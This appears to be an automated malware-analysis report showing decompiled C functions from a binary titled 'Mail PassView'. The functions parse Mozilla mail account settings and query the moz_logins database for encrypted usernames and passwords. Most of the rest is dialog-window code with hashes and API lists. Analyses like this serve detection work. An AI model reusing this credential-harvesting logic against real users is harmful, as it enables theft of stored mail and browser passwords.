                                                  • String ID: Account_Name$IMAP_Password2$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP_Email_Address$NNTP_Password2$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3_Password2$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP_Email_Address$SMTP_Password2$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
                                                  • API String ID: 1113949926-2499304436
                                                  • Opcode ID: 0c75f3a23bfcbdff00a9aa801863508d09b02361048c6915a7d59a784447564f
                                                  • Instruction ID: 03d5d7842382467f3947e80262f6a1f2e973b0058f56c731c8fd5b97bb90a946
                                                  • Opcode Fuzzy Hash: 0c75f3a23bfcbdff00a9aa801863508d09b02361048c6915a7d59a784447564f
                                                  • Instruction Fuzzy Hash: D391517220870569E624B7329C02FD773E8AF9032DF21052FF55BE61D2EEADB981465C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040C7CF, Relevance: 61.5, APIs: 21, Strings: 14, Instructions: 232stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 74%
                                                  			E0040C7CF(intOrPtr __ecx, void* __edx, char* _a4, char* _a8) {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				void _v271;
				char _v272;
				void* __ebx;
				void* __edi;
				int _t64;
				int _t66;
				int _t68;
				int _t69;
				int _t72;
				int _t85;
				void* _t91;
				void* _t132;
				char* _t133;
				char* _t135;
				char* _t137;
				char* _t139;
				intOrPtr _t151;
				int _t153;
				int _t154;
				void* _t155;

				_t132 = __edx;
				_v12 = __ecx;
				_v272 = 0;
				memset( &_v271, 0, 0xff);
				_t133 = "mail.account.account";
				_t64 = strlen(_t133);
				_t148 = _t64;
				_t134 = _a4;
				if(strncmp(_a4, _t133, _t64) != 0) {
					_v8 = _v8 & 0x00000000;
				} else {
					_v8 = E0040C748(_t134,  &_v16, _t148);
				}
				if(_v8 != 0) {
					_push("identities");
					_push(_v8);
					L004115B2();
					if(_t91 == 0) {
						_t17 = _t155 + 0x604; // 0x604
						E004060D0(0xff, _t17, _a8);
					}
				}
				_t135 = "mail.server";
				_t66 = strlen(_t135);
				_t149 = _t66;
				_t136 = _a4;
				if(strncmp(_a4, _t135, _t66) != 0) {
					_v8 = _v8 & 0x00000000;
				} else {
					_v8 = E0040C6F3(_t149, _t136,  &_v272);
				}
				if(_v8 != 0) {
					_t85 = E0040CA7D(_v12 + 0xffffffe8, _t132,  &_v272);
					_push("username");
					_push(_v8);
					_t154 = _t85;
					L004115B2();
					if(_t85 == 0) {
						_t28 = _t154 + 0x204; // 0x204
						_t85 = E004060D0(0xff, _t28, _a8);
					}
					_push("type");
					_push(_v8);
					L004115B2();
					if(_t85 == 0) {
						_t31 = _t154 + 0x504; // 0x504
						_t85 = E004060D0(0xff, _t31, _a8);
					}
					_push("hostname");
					_push(_v8);
					L004115B2();
					if(_t85 == 0) {
						_t34 = _t154 + 0x104; // 0x104
						_t85 = E004060D0(0xff, _t34, _a8);
					}
					_push("port");
					_push(_v8);
					L004115B2();
					if(_t85 == 0) {
						_t85 = atoi(_a8);
						 *(_t154 + 0x804) = _t85;
					}
					_push("useSecAuth");
					_push(_v8);
					L004115B2();
					if(_t85 == 0) {
						_push("true");
						_push(_a8);
						L004115B2();
						if(_t85 == 0) {
							 *((intOrPtr*)(_t154 + 0x808)) = 1;
						}
					}
				}
				_t137 = "mail.identity";
				_t68 = strlen(_t137);
				_t150 = _t68;
				_t138 = _a4;
				_t69 = strncmp(_a4, _t137, _t68);
				if(_t69 != 0) {
					_v8 = _v8 & 0x00000000;
				} else {
					_t69 = E0040C6F3(_t150, _t138,  &_v272);
					_v8 = _t69;
				}
				if(_v8 != 0) {
					_t69 = E0040CA7D(_v12 + 0xffffffe8, _t132,  &_v272);
					_push("useremail");
					_push(_v8);
					_t153 = _t69;
					L004115B2();
					if(_t69 == 0) {
						_t51 = _t153 + 0x404; // 0x404
						_t69 = E004060D0(0xff, _t51, _a8);
					}
					_push("fullname");
					_push(_v8);
					L004115B2();
					if(_t69 == 0) {
						_t54 = _t153 + 4; // 0x4
						_t69 = E004060D0(0xff, _t54, _a8);
					}
				}
				_push("signon.signonfilename");
				_push(_a4);
				L004115B2();
				if(_t69 == 0) {
					_t151 = _v12;
					_t139 = _t151 + 0x245;
					_t152 = _t151 + 0x140;
					_t72 = strlen(_t151 + 0x140);
					_t60 = strlen(_a8) + 1; // 0x1
					if(_t72 + _t60 >= 0x104) {
						 *_t139 = 0;
					} else {
						E004062AD(_t139, _t152, _a8);
					}
				}
				return 1;
			}


























                                                  0x0040c7cf
                                                  0x0040c7ea
                                                  0x0040c7ed
                                                  0x0040c7f4
                                                  0x0040c7f9
                                                  0x0040c7ff
                                                  0x0040c804
                                                  0x0040c808
                                                  0x0040c816
                                                  0x0040c827
                                                  0x0040c818
                                                  0x0040c822
                                                  0x0040c822
                                                  0x0040c82f
                                                  0x0040c863
                                                  0x0040c868
                                                  0x0040c86b
                                                  0x0040c874
                                                  0x0040c879
                                                  0x0040c87f
                                                  0x0040c884
                                                  0x0040c874
                                                  0x0040c885
                                                  0x0040c88b
                                                  0x0040c890
                                                  0x0040c894
                                                  0x0040c8a2
                                                  0x0040c8b7
                                                  0x0040c8a4
                                                  0x0040c8b2
                                                  0x0040c8b2
                                                  0x0040c8bf
                                                  0x0040c8d2
                                                  0x0040c8d7
                                                  0x0040c8dc
                                                  0x0040c8df
                                                  0x0040c8e1
                                                  0x0040c8ea
                                                  0x0040c8ef
                                                  0x0040c8f5
                                                  0x0040c8fa
                                                  0x0040c8fb
                                                  0x0040c900
                                                  0x0040c903
                                                  0x0040c90c
                                                  0x0040c911
                                                  0x0040c917
                                                  0x0040c91c
                                                  0x0040c91d
                                                  0x0040c922
                                                  0x0040c925
                                                  0x0040c92e
                                                  0x0040c933
                                                  0x0040c939
                                                  0x0040c93e
                                                  0x0040c93f
                                                  0x0040c944
                                                  0x0040c947
                                                  0x0040c950
                                                  0x0040c955
                                                  0x0040c95b
                                                  0x0040c95b
                                                  0x0040c961
                                                  0x0040c966
                                                  0x0040c969
                                                  0x0040c972
                                                  0x0040c974
                                                  0x0040c979
                                                  0x0040c97c
                                                  0x0040c985
                                                  0x0040c987
                                                  0x0040c987
                                                  0x0040c985
                                                  0x0040c972
                                                  0x0040c991
                                                  0x0040c997
                                                  0x0040c99c
                                                  0x0040c9a0
                                                  0x0040c9a4
                                                  0x0040c9ae
                                                  0x0040c9c3
                                                  0x0040c9b0
                                                  0x0040c9b9
                                                  0x0040c9be
                                                  0x0040c9be
                                                  0x0040c9cb
                                                  0x0040c9da
                                                  0x0040c9df
                                                  0x0040c9e4
                                                  0x0040c9e7
                                                  0x0040c9e9
                                                  0x0040c9f2
                                                  0x0040c9f7
                                                  0x0040c9fd
                                                  0x0040ca02
                                                  0x0040ca03
                                                  0x0040ca08
                                                  0x0040ca0b
                                                  0x0040ca14
                                                  0x0040ca19
                                                  0x0040ca1c
                                                  0x0040ca21
                                                  0x0040ca14
                                                  0x0040ca22
                                                  0x0040ca27
                                                  0x0040ca2a
                                                  0x0040ca33
                                                  0x0040ca35
                                                  0x0040ca38
                                                  0x0040ca3e
                                                  0x0040ca45
                                                  0x0040ca54
                                                  0x0040ca5f
                                                  0x0040ca70
                                                  0x0040ca61
                                                  0x0040ca67
                                                  0x0040ca6d
                                                  0x0040ca5f
                                                  0x0040ca7a

                                                  APIs
                                                  • memset.MSVCRT ref: 0040C7F4
                                                  • strlen.MSVCRT ref: 0040C7FF
                                                  • strncmp.MSVCRT(?,mail.account.account,00000000,mail.account.account,?,00000000,000000FF), ref: 0040C80C
                                                  • _stricmp.MSVCRT(00000000,server), ref: 0040C849
                                                  • _stricmp.MSVCRT(00000000,identities), ref: 0040C86B
                                                  • strlen.MSVCRT ref: 0040C88B
                                                  • strncmp.MSVCRT(?,mail.server,00000000,mail.server), ref: 0040C898
                                                  • _stricmp.MSVCRT(00000000,username,00000000), ref: 0040C8E1
                                                  • _stricmp.MSVCRT(00000000,type,00000000), ref: 0040C903
                                                  • _stricmp.MSVCRT(00000000,hostname,00000000), ref: 0040C925
                                                  • _stricmp.MSVCRT(00000000,port,00000000), ref: 0040C947
                                                  • atoi.MSVCRT ref: 0040C955
                                                    • Part of subcall function 0040C748: memset.MSVCRT ref: 0040C77E
                                                    • Part of subcall function 0040C748: memcpy.MSVCRT ref: 0040C7A0
                                                    • Part of subcall function 0040C748: atoi.MSVCRT ref: 0040C7B4
                                                  • _stricmp.MSVCRT(00000000,useSecAuth,00000000), ref: 0040C969
                                                  • _stricmp.MSVCRT(?,true,00000000), ref: 0040C97C
                                                  • strlen.MSVCRT ref: 0040C997
                                                  • strncmp.MSVCRT(?,mail.identity,00000000,mail.identity), ref: 0040C9A4
                                                  • _stricmp.MSVCRT(00000000,useremail,00000000), ref: 0040C9E9
                                                  • _stricmp.MSVCRT(00000000,fullname,00000000), ref: 0040CA0B
                                                  • _stricmp.MSVCRT(?,signon.signonfilename), ref: 0040CA2A
                                                  • strlen.MSVCRT ref: 0040CA45
                                                  • strlen.MSVCRT ref: 0040CA4F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _stricmp$strlen$strncmp$atoimemset$memcpy
                                                  • String ID: fullname$hostname$identities$mail.account.account$mail.identity$mail.server$port$server$signon.signonfilename$true$type$useSecAuth$useremail$username
                                                  • API String ID: 736090197-593045482
                                                  • Opcode ID: fa6975b133b13f5067aa23c0df6e7e68559b1782356a0831ed68d1fdd542dc29
                                                  • Instruction ID: 8e23c8f9271997a3be880b93158be8956f510041fead3e1da2e0ecaa9a645c54
                                                  • Opcode Fuzzy Hash: fa6975b133b13f5067aa23c0df6e7e68559b1782356a0831ed68d1fdd542dc29
                                                  • Instruction Fuzzy Hash: E271C972504204FADF10EB65CC42BDE77A6DF50329F20426BF506B21E1EB79AF819A5C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040E4A4, Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 264stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 98%
                                                  			E0040E4A4(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, struct HDC__* _a16, long _a20, long _a24, intOrPtr _a28, signed int _a32, long _a36, intOrPtr _a40, struct tagPOINT _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, struct tagPOINT _a60, intOrPtr _a64, intOrPtr _a68, intOrPtr _a72, intOrPtr _a76, char _a80, intOrPtr _a84, intOrPtr _a88, intOrPtr _a92, long _a96, struct tagPOINT _a100, intOrPtr _a104, intOrPtr _a108, intOrPtr _a112, struct tagSIZE _a116, struct tagRECT _a124, intOrPtr _a128, intOrPtr _a136, char _a336) {
				signed int _v0;
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v28;
				intOrPtr _v44;
				struct HWND__* _v48;
				struct HWND__* _v52;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				struct HDC__* _t169;
				struct HWND__* _t171;
				intOrPtr _t223;
				void* _t224;
				intOrPtr _t235;
				struct HWND__* _t237;
				void* _t240;
				intOrPtr* _t274;
				signed int _t275;
				signed int _t276;

				_t274 = __esi;
				_t276 = _t275 & 0xfffffff8;
				E004118A0(0x2198, __ecx);
				_a12 =  *((intOrPtr*)( *((intOrPtr*)(__esi + 0x10)) + 0x1b4));
				_t237 = GetDlgItem( *(__esi + 4), 0x3e9);
				_a4 = GetDlgItem( *(__esi + 4), 0x3e8);
				_a20 = GetWindowLongA(_t237, 0xfffffff0);
				_a24 = GetWindowLongA(_a4, 0xfffffff0);
				_a96 = GetWindowLongA(_t237, 0xffffffec);
				_a36 = GetWindowLongA(_a4, 0xffffffec);
				GetWindowRect(_t237,  &_a100);
				GetWindowRect(_a4,  &_a60);
				MapWindowPoints(0,  *(__esi + 4),  &_a100, 2);
				MapWindowPoints(0,  *(__esi + 4),  &_a60, 2);
				_t240 = _a108 - _a100.x;
				_a4 = _a4 & 0x00000000;
				_a28 = _a68 - _a60.x;
				_a76 = _a112 - _a104;
				_a40 = _a72 - _a64;
				_t169 = GetDC( *(__esi + 4));
				_a16 = _t169;
				if(_t169 == 0) {
					L9:
					_v0 = _v0 & 0x00000000;
					if( *((intOrPtr*)( *((intOrPtr*)(_t274 + 0x10)) + 0x1b0)) <= 0) {
						L12:
						_t171 = GetDlgItem( *(_t274 + 4), 1);
						_a36 = _t171;
						GetWindowRect(_t171,  &_a44);
						MapWindowPoints(0,  *(_t274 + 4),  &_a44, 2);
						GetClientRect( *(_t274 + 4),  &_a124);
						GetWindowRect( *(_t274 + 4),  &_a80);
						SetWindowPos( *(_t274 + 4), 0, 0, 0, _a88 - _a80 + 1, _a128 - _a136 - _a48 - _a84 + _a56 + _a92 + _a4 + 0x15, 0x206);
						GetClientRect( *(_t274 + 4),  &_a80);
						return SetWindowPos(_a36, 0, _a44.x, _a48 - _a56 - _a84 + _a92 - 5, _a52 - _a44 + 1, _a56 - _a48 + 1, 0x204);
					}
					_a20 = _a20 | 0x10000000;
					_a24 = _a24 | 0x10000000;
					_a8 = _a12 + 0x10;
					do {
						 *((intOrPtr*)( *_t274 + 0x1c))(_v0);
						_v20 = E00401562(_t274, _a92, "STATIC", _a16, _a96, _v0 + _a100.x, _t240, _a72);
						_v44 = E00401562(_t274, _a4, "EDIT", _v8, _a28, _v28 + _a32, _v4,  *(_t274 + 0x14) * _a8);
						sprintf( &_a80, "%s:", _v52->i);
						_t276 = _t276 + 0xc;
						SetWindowTextA(_v48,  &_a80);
						SetWindowTextA(_v52,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t274 + 0xc))))))(_v60,  &_a336));
						_v60 = _v60 + 0x14;
						_v64 = _v64 +  *(_t274 + 0x14) * _v28 +  *((intOrPtr*)(_t274 + 0x18));
						_v68 = _v68 + 1;
					} while (_v68 <  *((intOrPtr*)( *((intOrPtr*)(_t274 + 0x10)) + 0x1b0)));
					goto L12;
				}
				_t223 = 0;
				_a32 = _a32 & 0;
				_a8 = 0;
				if( *((intOrPtr*)( *((intOrPtr*)(__esi + 0x10)) + 0x1b0)) <= 0) {
					L8:
					_t224 = _t223 - _t240;
					_a28 = _a28 - _t224;
					_a60.x = _a60.x + _t224;
					_t240 = _t240 + _t224;
					ReleaseDC( *(_t274 + 4), _a16);
					goto L9;
				}
				_v0 = _a12 + 0x10;
				do {
					if(GetTextExtentPoint32A(_a16,  *_v0, strlen( *_v0),  &_a116) != 0) {
						_t235 = _a100.x + 0xa;
						if(_t235 > _v8) {
							_v8 = _t235;
						}
					}
					_a16 =  &(_a16->i);
					_v16 = _v16 + 0x14;
				} while (_a16 <  *((intOrPtr*)( *((intOrPtr*)(_t274 + 0x10)) + 0x1b0)));
				_t223 = _v8;
				goto L8;
			}

























                                                  0x0040e4a4
                                                  0x0040e4a7
                                                  0x0040e4af
                                                  0x0040e4cd
                                                  0x0040e4db
                                                  0x0040e4e8
                                                  0x0040e4f4
                                                  0x0040e4fd
                                                  0x0040e509
                                                  0x0040e515
                                                  0x0040e51f
                                                  0x0040e52a
                                                  0x0040e53e
                                                  0x0040e54c
                                                  0x0040e55d
                                                  0x0040e561
                                                  0x0040e566
                                                  0x0040e575
                                                  0x0040e581
                                                  0x0040e585
                                                  0x0040e58d
                                                  0x0040e591
                                                  0x0040e629
                                                  0x0040e62c
                                                  0x0040e638
                                                  0x0040e746
                                                  0x0040e74b
                                                  0x0040e757
                                                  0x0040e75b
                                                  0x0040e769
                                                  0x0040e780
                                                  0x0040e78a
                                                  0x0040e7d0
                                                  0x0040e7da
                                                  0x0040e819
                                                  0x0040e819
                                                  0x0040e649
                                                  0x0040e65a
                                                  0x0040e65e
                                                  0x0040e662
                                                  0x0040e66a
                                                  0x0040e69c
                                                  0x0040e6cc
                                                  0x0040e6e3
                                                  0x0040e6e8
                                                  0x0040e6f7
                                                  0x0040e715
                                                  0x0040e726
                                                  0x0040e72b
                                                  0x0040e72f
                                                  0x0040e73a
                                                  0x00000000
                                                  0x0040e662
                                                  0x0040e59a
                                                  0x0040e59c
                                                  0x0040e5a6
                                                  0x0040e5aa
                                                  0x0040e610
                                                  0x0040e614
                                                  0x0040e619
                                                  0x0040e61d
                                                  0x0040e621
                                                  0x0040e623
                                                  0x00000000
                                                  0x0040e623
                                                  0x0040e5b3
                                                  0x0040e5b7
                                                  0x0040e5de
                                                  0x0040e5e7
                                                  0x0040e5ee
                                                  0x0040e5f0
                                                  0x0040e5f0
                                                  0x0040e5ee
                                                  0x0040e5f4
                                                  0x0040e5ff
                                                  0x0040e604
                                                  0x0040e60c
                                                  0x00000000

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                  • String ID: %s:$EDIT$STATIC
                                                  • API String ID: 1703216249-3046471546
                                                  • Opcode ID: 63f961038f13364f7976eadaedf26f00b3f2f6ee041d7cedeb7d286e156d3b6f
                                                  • Instruction ID: 2f6da9a5868e125b8128a3bf626dfa5428397bb468519cd7ccc35e9b597c58da
                                                  • Opcode Fuzzy Hash: 63f961038f13364f7976eadaedf26f00b3f2f6ee041d7cedeb7d286e156d3b6f
                                                  • Instruction Fuzzy Hash: C9B1DE71108341AFD710DFA8C985A6BBBE9FF88704F008A2DF699D2260D775E814CF16
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004010E5, Relevance: 45.7, APIs: 25, Strings: 1, Instructions: 176COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 84%
                                                  			E004010E5(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, unsigned int _a12) {
				struct tagPOINT _v12;
				void* __esi;
				void* _t47;
				struct HBRUSH__* _t56;
				void* _t61;
				unsigned int _t62;
				void* _t67;
				struct HWND__* _t68;
				struct HWND__* _t69;
				void* _t72;
				unsigned int _t73;
				struct HWND__* _t75;
				struct HWND__* _t76;
				struct HWND__* _t77;
				struct HWND__* _t78;
				unsigned int _t83;
				struct HWND__* _t85;
				struct HWND__* _t87;
				struct HWND__* _t88;
				struct tagPOINT _t94;
				struct tagPOINT _t96;
				void* _t102;
				void* _t113;

				_t102 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t47 = _a4 - 0x110;
				_t113 = __ecx;
				if(_t47 == 0) {
					__eflags =  *0x417348;
					if(__eflags != 0) {
						SetDlgItemTextA( *(__ecx + 4), 0x3ee, 0x417348);
					} else {
						ShowWindow(GetDlgItem( *(__ecx + 4), 0x3ed), 0);
						ShowWindow(GetDlgItem( *(_t113 + 4), 0x3ee), 0);
					}
					SetWindowTextA( *(_t113 + 4), "Mail PassView");
					SetDlgItemTextA( *(_t113 + 4), 0x3ea, _t113 + 0xc);
					SetDlgItemTextA( *(_t113 + 4), 0x3ec, _t113 + 0x10b);
					E00401085(_t113, __eflags);
					E00406491(_t102,  *(_t113 + 4));
					goto L29;
				} else {
					_t61 = _t47 - 1;
					if(_t61 == 0) {
						_t62 = _a8;
						__eflags = _t62 - 1;
						if(_t62 != 1) {
							goto L29;
						} else {
							__eflags = _t62 >> 0x10;
							if(_t62 >> 0x10 != 0) {
								goto L29;
							} else {
								EndDialog( *(__ecx + 4), 1);
								DeleteObject( *(_t113 + 0x20c));
								goto L8;
							}
						}
					} else {
						_t67 = _t61 - 0x27;
						if(_t67 == 0) {
							_t68 = GetDlgItem( *(__ecx + 4), 0x3ec);
							__eflags = _a12 - _t68;
							if(_a12 != _t68) {
								__eflags =  *0x417388;
								if( *0x417388 == 0) {
									goto L29;
								} else {
									_t69 = GetDlgItem( *(_t113 + 4), 0x3ee);
									__eflags = _a12 - _t69;
									if(_a12 != _t69) {
										goto L29;
									} else {
										goto L18;
									}
								}
							} else {
								L18:
								SetBkMode(_a8, 1);
								SetTextColor(_a8, 0xc00000);
								_t56 = GetSysColorBrush(0xf);
							}
						} else {
							_t72 = _t67 - 0xc8;
							if(_t72 == 0) {
								_t73 = _a12;
								_t94 = _t73 & 0x0000ffff;
								_v12.x = _t94;
								_v12.y = _t73 >> 0x10;
								_t75 = GetDlgItem( *(__ecx + 4), 0x3ec);
								_push(_v12.y);
								_a8 = _t75;
								_t76 = ChildWindowFromPoint( *(_t113 + 4), _t94);
								__eflags = _t76 - _a8;
								if(_t76 != _a8) {
									__eflags =  *0x417388;
									if( *0x417388 == 0) {
										goto L29;
									} else {
										_t77 = GetDlgItem( *(_t113 + 4), 0x3ee);
										_push(_v12.y);
										_t78 = ChildWindowFromPoint( *(_t113 + 4), _v12.x);
										__eflags = _t78 - _t77;
										if(_t78 != _t77) {
											goto L29;
										} else {
											goto L13;
										}
									}
								} else {
									L13:
									SetCursor(LoadCursorA( *0x416b94, 0x67));
									goto L8;
								}
							} else {
								if(_t72 != 0) {
									L29:
									_t56 = 0;
									__eflags = 0;
								} else {
									_t83 = _a12;
									_t96 = _t83 & 0x0000ffff;
									_v12.x = _t96;
									_v12.y = _t83 >> 0x10;
									_t85 = GetDlgItem( *(__ecx + 4), 0x3ec);
									_push(_v12.y);
									_a8 = _t85;
									if(ChildWindowFromPoint( *(_t113 + 4), _t96) != _a8) {
										__eflags =  *0x417388;
										if( *0x417388 == 0) {
											goto L29;
										} else {
											_t87 = GetDlgItem( *(_t113 + 4), 0x3ee);
											_push(_v12.y);
											_t88 = ChildWindowFromPoint( *(_t113 + 4), _v12);
											__eflags = _t88 - _t87;
											if(_t88 != _t87) {
												goto L29;
											} else {
												_push(0x417388);
												goto L7;
											}
										}
									} else {
										_push(_t113 + 0x10b);
										L7:
										_push( *(_t113 + 4));
										E00406523();
										L8:
										_t56 = 1;
									}
								}
							}
						}
					}
				}
				return _t56;
			}


























                                                  0x004010e5
                                                  0x004010e8
                                                  0x004010e9
                                                  0x004010ed
                                                  0x004010f5
                                                  0x004010f7
                                                  0x004012b2
                                                  0x004012b9
                                                  0x004012f4
                                                  0x004012bb
                                                  0x004012d4
                                                  0x004012e3
                                                  0x004012e3
                                                  0x00401302
                                                  0x0040131a
                                                  0x0040132b
                                                  0x0040132d
                                                  0x00401335
                                                  0x00000000
                                                  0x004010fd
                                                  0x004010fd
                                                  0x004010fe
                                                  0x0040127d
                                                  0x00401280
                                                  0x00401284
                                                  0x00000000
                                                  0x0040128a
                                                  0x0040128d
                                                  0x00401290
                                                  0x00000000
                                                  0x00401296
                                                  0x0040129b
                                                  0x004012a7
                                                  0x00000000
                                                  0x004012a7
                                                  0x00401290
                                                  0x00401104
                                                  0x00401104
                                                  0x00401107
                                                  0x0040122e
                                                  0x00401230
                                                  0x00401233
                                                  0x0040125b
                                                  0x00401262
                                                  0x00000000
                                                  0x00401268
                                                  0x00401270
                                                  0x00401272
                                                  0x00401275
                                                  0x00000000
                                                  0x0040127b
                                                  0x00000000
                                                  0x0040127b
                                                  0x00401275
                                                  0x00401235
                                                  0x00401235
                                                  0x0040123a
                                                  0x00401248
                                                  0x00401250
                                                  0x00401250
                                                  0x0040110d
                                                  0x0040110d
                                                  0x00401112
                                                  0x004011a2
                                                  0x004011ab
                                                  0x004011b9
                                                  0x004011bc
                                                  0x004011bf
                                                  0x004011c1
                                                  0x004011c4
                                                  0x004011d1
                                                  0x004011d3
                                                  0x004011d6
                                                  0x004011f2
                                                  0x004011f9
                                                  0x00000000
                                                  0x004011ff
                                                  0x00401207
                                                  0x00401209
                                                  0x00401214
                                                  0x00401216
                                                  0x00401218
                                                  0x00000000
                                                  0x0040121e
                                                  0x00000000
                                                  0x0040121e
                                                  0x00401218
                                                  0x004011d8
                                                  0x004011d8
                                                  0x004011e7
                                                  0x00000000
                                                  0x004011e7
                                                  0x00401118
                                                  0x0040111a
                                                  0x0040133b
                                                  0x0040133b
                                                  0x0040133b
                                                  0x00401120
                                                  0x00401120
                                                  0x00401129
                                                  0x00401137
                                                  0x0040113a
                                                  0x0040113d
                                                  0x0040113f
                                                  0x00401142
                                                  0x00401154
                                                  0x0040116f
                                                  0x00401176
                                                  0x00000000
                                                  0x0040117c
                                                  0x00401184
                                                  0x00401186
                                                  0x00401191
                                                  0x00401193
                                                  0x00401195
                                                  0x00000000
                                                  0x0040119b
                                                  0x0040119b
                                                  0x00000000
                                                  0x0040119b
                                                  0x00401195
                                                  0x00401156
                                                  0x0040115c
                                                  0x0040115d
                                                  0x0040115d
                                                  0x00401160
                                                  0x00401167
                                                  0x00401169
                                                  0x00401169
                                                  0x00401154
                                                  0x0040111a
                                                  0x00401112
                                                  0x00401107
                                                  0x004010fe
                                                  0x00401341

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObject
                                                  • String ID: Mail PassView
                                                  • API String ID: 3628558512-272225179
                                                  • Opcode ID: 8369354600cb7b80dd2c736e043661f8d54616cc87117d1ac6397b61caa72165
                                                  • Instruction ID: a5e01e197ecdabf9e6bdb75eaf1794657044b10619e6b9182d208ef804a260cb
                                                  • Opcode Fuzzy Hash: 8369354600cb7b80dd2c736e043661f8d54616cc87117d1ac6397b61caa72165
                                                  • Instruction Fuzzy Hash: 68518130044248BFEB259F60DE85EAE7BB5EB04700F10853AFA56E65F0C7759D61EB08
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040CE28, Relevance: 42.3, APIs: 21, Strings: 3, Instructions: 311stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 73%
                                                  			E0040CE28(void* __ecx, void* __eflags, intOrPtr _a4, char* _a8) {
				char* _v8;
				int _v12;
				char* _v16;
				char* _v20;
				char* _v24;
				int* _v28;
				char* _v32;
				int _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v64;
				intOrPtr _v68;
				char _v72;
				char _v76;
				void _v331;
				int _v332;
				void _v587;
				int _v588;
				void _v851;
				char _v852;
				void _v1378;
				short _v1380;
				void _v1995;
				char _v1996;
				void _v2611;
				char _v2612;
				char _v3636;
				char _v4660;
				char _v5684;
				char _v6708;
				char _v7732;
				void _v8755;
				char _v8756;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t115;
				signed int _t116;
				int _t118;
				void* _t130;
				char* _t170;
				intOrPtr _t175;
				char* _t177;
				int _t196;
				intOrPtr _t226;
				void* _t229;
				int* _t232;
				char* _t235;
				void* _t237;
				void* _t238;
				void* _t239;
				void* _t240;

				E004118A0(0x2234, __ecx);
				_t226 = _a4;
				_t232 = _t226 + 0x30;
				_v28 = _t232;
				_t115 = E0040DEEE(_t232, _t226 + 0x362);
				if(_t115 == 0) {
					L43:
					return _t115;
				}
				_t116 = _t232[1];
				_t196 = 0;
				if(_t116 == 0) {
					_t115 = _t116 | 0xffffffff;
				} else {
					_t115 =  *_t116(_t226 + 0x158);
				}
				if(_t115 != _t196) {
					L41:
					if( *_t232 == _t196) {
						goto L43;
					}
					_t118 = SetCurrentDirectoryA( &(_t232[8]));
					 *_t232 = _t196;
					return _t118;
				} else {
					_v36 = _t196;
					if(E0040F64B( &_v72, _t226 + 0x362) == 0) {
						L39:
						_t232 = _v28;
						_t115 = _t232[2];
						if(_t115 != _t196) {
							_t115 =  *_t115();
						}
						goto L41;
					} else {
						_v12 = _t196;
						_v1380 = _t196;
						memset( &_v1378, _t196, 0x208);
						_v852 = _t196;
						memset( &_v851, _t196, 0x104);
						_t239 = _t238 + 0x18;
						MultiByteToWideChar(_t196, _t196, _a8, 0xffffffff,  &_v1380, 0x104);
						WideCharToMultiByte(0xfde9, _t196,  &_v1380, 0xffffffff,  &_v852, 0x104, _t196, _t196);
						if(_v72 != _t196) {
							_v72( &_v852,  &_v12);
						}
						if(_v12 == _t196) {
							goto L39;
						}
						_a8 = _t196;
						if(_v68 != _t196) {
							_v68(_v12, "SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins", 0xffffffff,  &_a8,  &_v76);
							_t239 = _t239 + 0x14;
						}
						L11:
						L11:
						if(_v64 == _t196) {
							_t130 = 0xffff;
						} else {
							_t130 = _v64(_a8);
						}
						if(_t130 != 0x64) {
							goto L34;
						}
						_v8756 = _t196;
						memset( &_v8755, _t196, 0x3ff);
						memset( &_v7732, _t196, 0x1400);
						_t240 = _t239 + 0x18;
						_t235 = E0040F7EE( &_v72, _a8, 1);
						_v20 = E0040F7EE( &_v72, _a8, 6);
						_v8 = E0040F7EE( &_v72, _a8, 7);
						_v24 = E0040F7EE( &_v72, _a8, 4);
						_v32 = E0040F7EE( &_v72, _a8, 5);
						_v16 = E0040F7EE( &_v72, _a8, 2);
						if(_t235 != _t196) {
							strcpy( &_v8756, _t235);
						}
						if(_v20 != _t196) {
							strcpy( &_v7732, _v20);
						}
						if(_v8 != _t196) {
							strcpy( &_v6708, _v8);
						}
